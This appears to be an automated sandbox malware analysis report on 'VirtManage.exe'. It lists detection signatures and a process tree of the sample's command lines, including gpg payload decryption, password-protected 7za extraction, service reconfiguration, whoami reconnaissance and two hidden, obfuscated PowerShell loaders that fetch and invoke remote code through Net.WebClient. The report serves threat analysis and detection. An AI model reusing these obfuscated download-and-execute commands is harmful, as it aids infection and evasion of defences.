Windows
Analysis Report
VirtManage.exe
Overview
General Information
Detection
Score: | 46 |
Range: | 0 - 100 |
Confidence: | 100% |
Compliance
Score: | 34 |
Range: | 0 - 100 |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains a domain name check
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
VirtManage.exe (PID: 6732 cmdline:
"C:\Users\ user\Deskt op\VirtMan age.exe" MD5: 582B28A61D76E50D86C4B17DEE4A9F42) gpg.exe (PID: 6968 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \tools.7z --decrypt C:\Program Data\Micro soft\Micro softAPI\5F ILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 7012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) gpg.exe (PID: 7084 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \7za.dll - -decrypt C :\ProgramD ata\Micros oft\Micros oftAPI\1FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 7120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) gpg.exe (PID: 1988 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \7za.exe - -decrypt C :\ProgramD ata\Micros oft\Micros oftAPI\2FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 7160 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 7za.exe (PID: 2688 cmdline:
C:\Program Data\Micro soft\Micro softAPI\7z a x C:\Pro gramData\M icrosoft\M icrosoftAP I\tools.7z -pJerx#sd qWE45 -oC: \ProgramDa ta\Microso ft\Microso ftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356) conhost.exe (PID: 2352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) msiexec.exe (PID: 2568 cmdline:
msiexec.ex e /i "C:\P rogramData \Microsoft \Microsoft API\RVTool s.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF) gpg.exe (PID: 5860 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \Cert.txt --decrypt C:\Program Data\Micro soft\Micro softAPI\3F ILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 5396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) gpg.exe (PID: 6456 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \UpdateFul l.7z --dec rypt C:\Pr ogramData\ Microsoft\ MicrosoftA PI\4FILE.1 A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 6028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) sc.exe (PID: 1988 cmdline:
sc config msdtc star t= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) conhost.exe (PID: 1192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) sc.exe (PID: 3148 cmdline:
sc config msdtc obj= "LocalSys tem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) conhost.exe (PID: 2524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) winapi.exe (PID: 348 cmdline:
C:\Program Data\Micro soft\Micro softAPI\wi napi.exe MD5: ADB9B72679B88DDE1749E0A438222156) powershell.exe (PID: 1000 cmdline:
powershell .exe -wind owstyle Hi dden -comm and "SV 5p W $('C:\Pr ogr'+'amDa ta\Micr'+' osoft\Micr o'+'softAP I\ieQ'+'u4 aeD'+'3u.t ');Set-Ite m Variable :\Sh 'Net. WebClient' ;dir rid*; Set-Variab le 7 (.(It em Variabl e:\*uti*t) .Value.((( Item Varia ble:\*uti* t).Value|G M)[6].Name ).(((Item Variable:\ *uti*t).Va lue.(((Ite m Variable :\*uti*t). Value|GM)[ 6].Name)|G M|Where-Ob ject{(Vari able _ -Va lueO).Name -clike'*dl *t'}).Name ).Invoke(( Item Varia ble:\*uti* t).Value.( ((Item Var iable:\*ut i*t).Value |GM)[6].Na me).(((Ite m Variable :\*uti*t). Value.(((I tem Variab le:\*uti*t ).Value|GM )[6].Name) .PsObject. Methods|Wh ere-Object {(Variable _ -ValueO ).Name-cli ke'*nd*e'} ).Name).In voke('N*ct ',1,$TRUE) )(GV Sh).V alue);Set- Variable G PW ((((Var iable 7).V alue|GM)|W here-Objec t{(Variabl e _ -Value O).Name-cl ike'D*g'}) .Name);.(G et-Command *e-*press *)((Variab le 7).Valu e.((GCI Va riable:/GP W).Value). Invoke((GV 5pW -Valu eO)))" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5444 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) csc.exe (PID: 7428 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\2s4bn4 bw\2s4bn4b w.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) cvtres.exe (PID: 7460 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user ~1\AppData \Local\Tem p\RES9D22. tmp" "c:\U sers\user\ AppData\Lo cal\Temp\2 s4bn4bw\CS C355371FC2 ED34AC6B0D 2C6DC18B93 58D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) whoami.exe (PID: 7556 cmdline:
"C:\Window s\system32 \whoami.ex e" MD5: A4A6924F3EAF97981323703D38FD99C4)
msiexec.exe (PID: 5696 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) msiexec.exe (PID: 6820 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 6DE2D63 DBA183F9FE 048D9EF702 3AC72 C MD5: 9D09DC1EDA745A5F87553048E57620CF) 7za.exe (PID: 7052 cmdline:
C:\Program Data\Micro soft\Micro softAPI\7z a x C:\Pro gramData\M icrosoft\M icrosoftAP I\UpdateFu ll.7z -pTG 98HJerxsdq WE45 -oC:\ ProgramDat a\Microsof t\Microsof tAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356) conhost.exe (PID: 6964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WmiPrvSE.exe (PID: 7052 cmdline:
C:\Windows \sysWOW64\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
winapi.exe (PID: 4564 cmdline:
"C:\Progra mData\Micr osoft\Upda teDesktop\ winapi.exe " MD5: ADB9B72679B88DDE1749E0A438222156) powershell.exe (PID: 6080 cmdline:
powershell .exe -wind owstyle Hi dden -comm and "SI Va riable:zX 'Net.WebCl ient';Set- Variable G 8E $('C:\P ro'+'gramD at'+'a\Mic ro'+'soft\ Update'+'D esktop\eep 6d'+'i0uGu .t');dir r id*;Set-Va riable kAl (.$Execut ionContext .InvokeCom mand.(($Ex ecutionCon text.Invok eCommand.P sObject.Me thods|Wher e-Object{( Get-Item V ariable:/_ ).Value.Na me-ilike'G *d'}).Name ).Invoke($ ExecutionC ontext.Inv okeCommand .GetComman dName('N*- O*',1,1),[ System.Man agement.Au tomation.C ommandType s]::Cmdlet )(GI Varia ble:\zX).V alue);Set- Item Varia ble:/75 (( ((DIR Vari able:\kAl) .Value|Mem ber)|Where -Object{(G et-Item Va riable:/_) .Value.Nam e-ilike'D* g'}).Name) ;$Executio nContext|F orEach{(Ge t-Item Var iable:/_). Value.Invo keCommand. (($Executi onContext. InvokeComm and|Member |Where-Obj ect{(Get-I tem Variab le:/_).Val ue.Name-il ike'*ke*pt '}).Name). Invoke((DI R Variable :\kAl).Val ue.((GV 75 -Va)).Inv oke((Child Item Varia ble:/G8E). Value))}" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) csc.exe (PID: 7776 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\e3jsey ke.cmdline " MD5: F65B029562077B648A6A5F6A1AA76A66) cvtres.exe (PID: 7792 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user ~1\AppData \Local\Tem p\RES6B4F. tmp" "c:\U sers\user\ AppData\Lo cal\Temp\C SCC2520B89 7D0D4F99AF 1935CDE776 7C35.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) whoami.exe (PID: 7856 cmdline:
"C:\Window s\system32 \whoami.ex e" MD5: A4A6924F3EAF97981323703D38FD99C4)
svchost.exe (PID: 5240 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
⊘No yara matches
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |